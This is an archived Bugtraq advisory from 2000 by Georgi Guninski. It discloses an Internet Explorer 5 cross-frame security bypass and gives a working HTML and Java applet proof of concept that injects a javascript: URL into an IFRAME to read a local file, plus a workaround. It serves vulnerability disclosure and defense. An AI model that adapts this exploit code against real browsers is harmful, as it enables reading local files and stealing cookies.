Bugtraq mailing list archives
IE 5 security vulnerablity - circumventing Cross-frame security policy using Java/JavaScript (and disabling Active Scripting is not that easy)
From: joro () NAT BG (Georgi Guninski)
Date: Tue, 18 Apr 2000 16:20:48 +0300
Georgi Guninski security advisory #10, 2000 IE 5 security vulnerablity - circumventing Cross-frame security policy using Java/JavaScript (and disabling Active Scripting is not that easy) Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski, bears NO responsibility for content or misuse of this program or any derivatives thereof. Description: Internet Explorer 5.01 under Windows 98 (suppose all other versions are also vulnerable) allows circumventing "Cross frame security policy" by accessing the DOM of documents using Java/JavaScript. This exposes the whole DOM of the target document and opens lots of security risks. This allows reading local files, reading files from any host, window spoofing, getting cookies, etc. Details: Note: This is NOT a bug in the Java language, this is a bug in Microsoft's implementation of Java in IE. Usually, IE 5.x does not allow assigning "javascript:" urls to the location object because this is dangerous. But this may be circumvented with the help of the interaction between Java and the DOM/JavaScript. The Java JSObject allows setting DOM properties from Java and allows setting a hostile javascript url to IFRAME's location. This leads to circumventing cross-frame security policy. Another issue is that choosing the option "Disable Active Scripting" from the security menu does not always disable Active Scripting. If you have Java enabled and Scripting of Java applets enabled, Active Scripting may be executed. The problem seems to be the fact that IE always executes Active Scripting in "My Computer" zone and with Java one may inject javascript: URLs in IFRAMEs in "My Computer" zone. So, to really disable Active Scripting disable Active Scripting and disable Java and/or Scripting of Java applets. The code is: ------jsinject.html-------------------------------- <IFRAME ID="I1" NAME="I1" SRC="file://c:/test.txt"></IFRAME> <applet MAYSCRIPT code="jsinject"> <param name="jscode" value="javascript:alert(document.body.innerText)"> </applet> <A HREF="javascript:document.applets[0].doit()">Read the file</A> --------------------------------------------------- ------jsinject.java-------------------------------- import java.applet.Applet; import netscape.javascript.*; public class jsinject extends Applet { public void doit() { try { JSObject win = (JSObject) JSObject.getWindow(this); JSObject doc = (JSObject) win.getMember("document"); JSObject I1 = (JSObject) doc.getMember("I1"); JSObject loc = (JSObject) I1.getMember("location"); loc.setMember("href",getParameter("jscode")); } catch(Exception x){System.out.println(x.toString());} } } --------------------------------------------------- Demonstration is available at: http://www.nat.bg/~joro/jsinject.html Workaround: Disable Java or disable Scripting of Java applets Copyright 2000 Georgi Guninski Regards, Georgi Guninski http://www.nat.bg/~joro
Current thread:
- IE 5 security vulnerablity - circumventing Cross-frame security policy using Java/JavaScript (and disabling Active Scripting is not that easy) Georgi Guninski (Apr 18)
- RFP2K03: Contemplations on dvwssr.dll and its affects on life rain forest puppy (Apr 20)
- Microsoft Security Bulletin (MS00-026) Microsoft Product Security (Apr 20)
- Re: IE 5 security vulnerablity - circumventing Cross-frame security policy using Java/JavaScript (and disabling Active Scripting is not that easy) TAKAGI, Hiromitsu (Apr 20)
- freebsd libncurses overflow Przemyslaw Frasunek (Apr 24)
- Re: freebsd libncurses overflow Kris Kennaway (Apr 24)
- Re: freebsd libncurses overflow Kris Kennaway (Apr 24)
- Re: freebsd libncurses overflow Przemyslaw Frasunek (Apr 25)
- freebsd libncurses overflow Przemyslaw Frasunek (Apr 24)
- Re: freebsd libncurses overflow Bill Fumerola (Apr 24)
- Re: freebsd libncurses overflow Theo de Raadt (Apr 26)
- Denial of Service Against pcAnywhere. Vacuum (Apr 25)